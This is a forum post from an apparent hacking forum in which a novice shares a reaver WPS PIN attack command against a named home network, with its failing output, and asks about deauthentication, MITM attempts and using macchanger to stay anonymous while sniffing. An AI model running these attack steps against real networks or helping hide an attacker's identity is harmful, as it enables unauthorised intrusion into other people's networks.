Login Register




The stories and information posted here are artistic works of fiction and falsehood. Only a fool would take anything posted here as fact.


I am terrible filter_list
Author
Message
RE: I am terrible #4
well I dont know what I am doing so...

the guides or tutorials I have seen on the Net show many forms of attacks, I was trying to pick a few easy ones, or what seemed easy... and am sure they are just when you understand what is going on fully... and have perspective... of the tools you are using.

I will copy the text from one common problem with reaver...



reaver -i wlan1mon -b (mac) -vv -K 1

Reaver v1.6b WiFi Protected Setup Attack Tool
Copyright © 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:7CBiggrin1:22:C9:B8
[+] Switching wlan1mon to channel 1
[+] Switching wlan1mon to channel 2
[+] Switching wlan1mon to channel 3
[+] Switching wlan1mon to channel 6
[+] Associated with C0:7CBiggrin1:22:C9:B8 (ESSID: HOME-A2CE-2.4)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2017-06-27 18:27:18 (0 seconds/pin)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
^Z
[1]+ Stopped reaver -i wlan1mon -b C0:7CBiggrin1:22:C9:B8 -vv -K 1


-------------------------------------------


edited


----------------------------------------

about the mitm attacks... i was attempting those because they seemed interesting to me, and was the beginning of my learnings... that and reaver,... which seemed to be the ones i wanted to use. I can get the handshakes and understand that you need a station to bump off for the re association... but getting past that point is my issue. i know it will be a thing of the past if I just keep at it.

The other thing is my confusion on macchanger... and remaining anonymous. from what I have experienced the mac changer isnt working and is revealing the attacking mac address or, source mac address. I have so much to learn. but I already have a few months of hands on, fails... and installing the OS and getting a dual boot with kali and ubuntu.. i havent got the windows os with a VM to work because yea, i just cant figure it out. I know i need that package that lets me fullscreen and use the usb ports... ie my NIC... i got it to work once and then once i removed the usb card, it wouldnt work again. even after a reinstall of kali and all the stuff after. I am learning how I think I should be learning... attempt, analyze, and modify, reattempt.

but i really think i should be making progress sometime and starting on experience.

i will go home and attempt to actually do a good job, and screen shot the fails so I can post if that kinda thing is cool. idk what info to not show... like my mac address... not sure if i really care cause eventually i will get a new computer as this one craps the bucket.

i wish i made a friend irl that could take me by the hand but tbh im kinda scared of that.

what i think i want is macchanger to work properly and change my id so when i do sniff im not broadcasting who it is.... i need to learn things like this. before i go any further i think. before i get myself arrested or in other form of trouble.
(This post was last modified: 09-23-2017, 12:07 AM by Imagined Self.)

Reply





Messages In This Thread
I am terrible - by Imagined Self - 09-21-2017, 05:22 AM
RE: I am terrible - by spec - 09-21-2017, 05:46 AM
RE: I am terrible - by mothered - 09-21-2017, 06:38 AM
RE: I am terrible - by Imagined Self - 09-21-2017, 08:33 PM
RE: I am terrible - by Imagined Self - 09-21-2017, 09:21 PM
RE: I am terrible - by Imagined Self - 09-28-2017, 09:02 PM
RE: I am terrible - by primitive - 09-30-2017, 05:33 PM